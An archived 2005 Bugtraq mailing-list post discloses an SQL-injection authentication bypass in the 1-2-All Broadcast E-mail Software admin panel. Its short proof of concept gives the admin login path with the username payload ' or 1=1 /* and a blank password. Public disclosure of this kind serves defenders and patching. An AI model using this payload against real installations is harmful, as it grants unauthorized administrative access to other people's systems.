lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20051111195241.11642.qmail@securityfocus.com> Date: 11 Nov 2005 19:52:41 -0000 From: bhs_team@...oo.com To: bugtraq@...urityfocus.com Subject: 1-2-All Broadcast E-mail Software vulnerable to a classic SQL admin 1-2-All Broadcast E-mail Software ( POC ) Supplying the following is sufficient to gain access to the admin control panel: Target : http://www.example.com/[12allTarget]/admin/index.php Username: ' or 1=1 /* Password: (Nothing)(Blank) Report By : POPO >From>IRAN> www.Babol-Hackers.com bhs_team@...oo.com Y! ID : bhs_team , pooya_0nline ----------------------------------- BHS-Team We Are : POPO + Padeshah + Black ICE + Ezraeil + UNDERTAKER + Fa0p